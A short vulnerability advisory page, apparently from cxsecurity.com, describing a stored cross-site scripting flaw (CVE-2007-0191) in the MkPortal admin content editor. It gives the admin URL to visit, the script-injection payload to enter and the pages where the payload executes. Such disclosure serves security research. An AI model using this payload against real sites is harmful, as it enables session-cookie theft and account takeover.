Bug: MkPortal Admin XSS ( Ascii Version )

Search:
WLB2

MkPortal Admin XSS

Published
Credit
Risk
2007.01.14
Demential
Low
CWE
CVE
Local
Remote
CWE-79
CVE-2007-0191
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

MkPortal Admin XSS

Discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it

Go to: /mkportal/admin.php?ind=ad_contents&op=contents_new

In both fields write:
"><script>alert(document.cookie)</script>
and press save.

Alert will appear here: /mkportal/admin.php?ind=ad_contents
and here: /mkportal/admin.php?ind=ad_contents&op=contents_edit&idc=*
where * is the ID of the page.

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version